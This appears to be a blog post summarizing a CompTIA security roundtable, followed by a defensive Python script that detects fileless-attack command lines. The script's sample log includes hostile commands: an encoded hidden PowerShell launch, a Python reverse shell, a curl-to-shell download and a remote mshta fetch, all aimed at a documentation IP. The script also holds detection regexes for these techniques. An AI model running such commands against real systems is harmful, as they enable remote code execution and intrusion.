Dr. James Stanger is CompTIA's Chief Technology Evangelist. He's a CompTIA superhero in my book: he travels all over the world, speaks at events, and represents the IT industry and CompTIA near and far.
I'm thankful to work with James on a series of roundtables we recently hosted in the New York area. He's engaging with or without his beloved Diet Coke, and he facilitated great conversation among our cyber professionals. Here are his top takeaways from the discussion.
1. Fileless security threats. Who needs traditional malware when you can wrap Python code around an image that does the same thing? After all, today's computing devices, from PCs to IoT devices, ship with a full stack of tools, libraries, and interpreters that any capable attacker can use to spin up any number of unexpected attacks without ever dropping a binary on disk. The implication is this: yes, we need to educate our end users, but we also need to limit the number of tools we leave lying around, waiting for attackers to turn them into improvised hacking tools.
2. The importance of continuous monitoring, over and above SIEM or intrusion detection solutions. It's very possible the next cutting-edge service will be third-party monitoring; the potential exists for companies to provide this service for a very reasonable fee.
3. Ransomware is getting worse. Backups and restoration services are critical, in addition to end-user training, and a backup only counts if ransomware can't reach it and a restore has actually been tested. Some even discussed instant reconstruction services that go beyond backup.
4. We're seeing Security Operations Center (SOC) teams get moved over to help desk and technical support centers, which most on the panel saw as a disaster. Most of the group felt that conflicts of interest would occur. After all, we all know the concept of segregation of duties; what happens when the need (or impulse) to provide tech support trumps security concerns? It's not a matter of if, but when.
5. Cryptojacking is a big trend now, including one MSP that actually installed cryptomining software on its clients' machines without notice. The MSP's explanation? They don't get paid enough for their security services, but the cryptomining software they install makes up for that! Good heavens!
6. A quarter of the organizations the MSPs and technology executives on our panel work with initially do no backup at all. None. Zero. Zip. Nada. Good grief!
7. End-user training is a vital security layer, as long as it is tied to an improvement policy. No one wants to become the "security police." But there comes a time when anyone who uses networked equipment needs to shoulder some responsibility.
8. IT managers and directors don't understand their own IT environment properly, mainly due to "shadow IT." Back in the day, IT and security managers tried to shut down shadow IT operations. Today, shadow or "stealth IT" is something to be managed rather than eliminated, because you can't secure what you don't know you have.
9. Ever wonder what market sectors the hackers are attacking the most? According to our roundtable, today’s hackers are "following the money," and attacking law, healthcare, education and accountancy firms at a breakneck pace.
10. Improving security isn't just a tech issue; it's a company culture issue.
11. We're seeing an explosion of devices and wearables, and we are now being asked to secure Industrial Control Systems (ICS) more than ever before, from SCADA to building systems such as HVAC and elevators, and robots.
12. As far as new security trends are concerned, the group is seeing the advent of analytics approaches in a big way. They also anticipate that blockchain and AI will become consumerized in the security space.
13. The group, like most, recognized the need for cybersecurity regulation, but stated that compliance-based approaches are never enough. Companies and organizations need leadership; many C-suite leaders fail to see the investment needed to protect the organization. So, it's up to IT leaders to "paint the picture" for C-suite and board-level individuals, and to discuss risk in business terms, not simply in "tech talk."
14. The roundtable members saw a distinct need for real, practical, and customized cybersecurity metrics for organizations. While there's no single set of usable, practical metrics that fits every organization, there surely is a common thread that the industry can discuss and learn from. This is especially interesting to us here at CompTIA, because we've been thinking the same thing! Stay tuned: we'll soon be releasing research results about security metrics. This research is derived from cybersecurity practitioners around the world, and focuses on the security metrics they use. It will also talk about how they use these metrics to justify Return on Investment (ROI) for their security teams, controls, and operations. These will be real metrics, derived from actual practitioners, rather than from software companies, the media, or people who are guessing. It's exciting to see how our research and our roundtables naturally start addressing the same topics! Great minds think alike!
15. GDPR: We see the benefits, but isn't it a bit extreme? Are we going to see more businesses simply stop doing business with the EU, or create workarounds? Or will we see increased regulation worldwide, including in the United States?
16. IT folks want to provide services – “to make stuff work.” Security pros always want to look at things differently, and anticipate problems. They are people who look at things “awry” – they enjoy taking things apart and adding strictness to keep things secure.
17. Workforce development: the roundtable members felt that organizations need to train their workers and assume they might leave. It's vital to mitigate the impact of employee loss and to keep a pipeline of talent. Invest in the right people; the people you train need to have the right aptitude and temperament for it. Internally, certifications may be used as a motivator to build careers.
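Item 1 above is the one technical point on the list: the attacker's payload never needs its own file, because an interpreter or trusted utility already on the host will run it from a command line, an encoded argument, or a download piped straight into a shell. The Python below is an added example, not code from CompTIA or from the roundtable participants. It does the two things item 1 calls for: it flags process launches that fit those fileless patterns, and it inventories which of the borrowable interpreters and utilities are present on a host. The log lines are constructed, and the pipe-delimited layout (timestamp|host|user|parent|command line) is an assumed minimal EDR/auditd-style export, not any product's real format.

```python
"""Detection helpers for the 'fileless' pattern in item 1: attacks that
carry no malware binary and instead borrow an interpreter or trusted
utility that is already on the box.

Added example, not code from CompTIA or the roundtable. The log lines are
constructed; the pipe-delimited layout (timestamp|host|user|parent|cmdline)
is an assumed minimal EDR/auditd-style export, not a product's format.
"""
import re
from pathlib import PureWindowsPath  # parses both '/' and '\' separators

# Interpreters and living-off-the-land utilities worth inventorying: each one
# present on a host is a tool an intruder can turn to their own purposes.
WATCHED_TOOLS = {
    "python", "python3", "perl", "ruby", "node", "php", "bash", "sh",
    "powershell", "pwsh", "cmd", "wscript", "cscript", "mshta",
    "regsvr32", "rundll32", "certutil",
}

# Ordered rules: first match wins. Each targets a way of running code
# that never needs a file of its own on disk.
RULES = [
    # powershell ... -e/-ec/-enc/-EncodedCommand <base64 blob>
    ("encoded_powershell",
     r"\bpowershell(?:\.exe)?\b.*?\s-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    # interpreter handed its program on the command line (-c / -e / -r)
    ("inline_code",
     r"\b(?:python[23]?|perl|ruby|node|php)\s+(?:-\S*\s+)*-[cer]\s"),
    # fetch from the network and pipe straight into an interpreter
    ("download_to_interpreter",
     r"\b(?:curl|wget|iwr|Invoke-WebRequest)\b.*\|\s*"
     r"(?:sh|bash|python[23]?|perl|ruby|powershell|pwsh|iex)\b"),
    # signed system utility pointed at a remote URL or UNC share
    ("lolbin_remote",
     r"\b(?:mshta|regsvr32|rundll32|certutil)(?:\.exe)?\b.*?(?:https?://|\\\\)"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def classify(cmdline):
    """Return the name of the first rule the command line trips, or None."""
    for name, rx in COMPILED:
        if rx.search(cmdline):
            return name
    return None


def triage(log_lines):
    """Split each line into its five fields and classify the command line.

    Returns (hits, skipped): hits is a list of dicts for flagged launches,
    skipped holds raw lines that did not have the expected layout.
    """
    hits, skipped = [], []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        fields = line.split("|", 4)  # maxsplit keeps shell pipes in cmdline
        if len(fields) != 5:
            skipped.append(line)
            continue
        ts, host, user, parent, cmdline = fields
        rule = classify(cmdline)
        if rule:
            hits.append({"time": ts, "host": host, "user": user,
                         "parent": parent, "rule": rule, "cmdline": cmdline})
    return hits, skipped


def inventory(paths):
    """Given executable paths (e.g. a listing of /usr/bin or System32),
    return the watched interpreters and utilities present, sorted."""
    names = {PureWindowsPath(p).name.lower() for p in paths}
    names |= {n[:-4] for n in names if n.endswith(".exe")}
    return sorted(WATCHED_TOOLS & names)


# Constructed sample; 203.0.113.0/24 is a documentation address range.
SAMPLE_LOG = """\
2024-03-04T09:12:01Z|ws-017|jdoe|explorer.exe|powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-03-04T09:12:07Z|web-03|www-data|apache2|python3 -c "import socket,os,pty;s=socket.socket();s.connect(('203.0.113.9',4444))"
2024-03-04T09:13:44Z|build-1|jenkins|sh|curl -s http://203.0.113.9/install.sh | sh
2024-03-04T09:14:02Z|ws-021|mlee|cmd.exe|mshta.exe http://203.0.113.9/update.hta
2024-03-04T09:15:30Z|web-03|deploy|sshd|python3 /opt/app/manage.py migrate
2024-03-04T09:16:12Z|ws-017|jdoe|explorer.exe|notepad.exe C:\\Users\\jdoe\\notes.txt
kernel: audit log rotated
""".splitlines()

if __name__ == "__main__":
    hits, skipped = triage(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']} {h['host']:8} {h['user']:9} {h['rule']:24} {h['cmdline']}")
    print(f"{len(hits)} flagged, {len(skipped)} malformed line(s) skipped")
    print("watched tools present:",
          inventory(["/usr/bin/python3", "/bin/sh", "/usr/bin/ls"]))
```

The benign lines (a Django migration run over SSH, Notepad opening a text file) pass untouched even though one of them invokes `python3`, which is the point: the signal is not the interpreter's presence but how it is being fed its program. The `inventory` helper is the "limit the tools lying around" half of item 1; feed it a directory listing from a gold image and anything it returns that the role doesn't need is a candidate for removal or application allowlisting.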
Special thanks to Titu Sarder of NetCom Learning for his partnership and securing space for us at Microsoft.
Thanks to all our roundtable participants.
- Allan Santana | vCIO | CHIPS Technology
- Domenick Gandolfo | Chief Security Strategist | CyberSafe Solutions
- Jake Lehman | Managing Director | Friedman CyZen
- Jevon S. Wooden | Senior Information Security Administrator | Consumer Reports
- Lauren Roje | Healthcare Specialist | Lincoln Computer Services
- Matthew Pascucci | Cyber Security Practice Manager | Contemporary Computer Services, Inc.
- Mo Rachbeer | National Academic Director | Npower
- Robert Kratzke | President | Best Tech
- William Mendez | Director | Friedman CyZen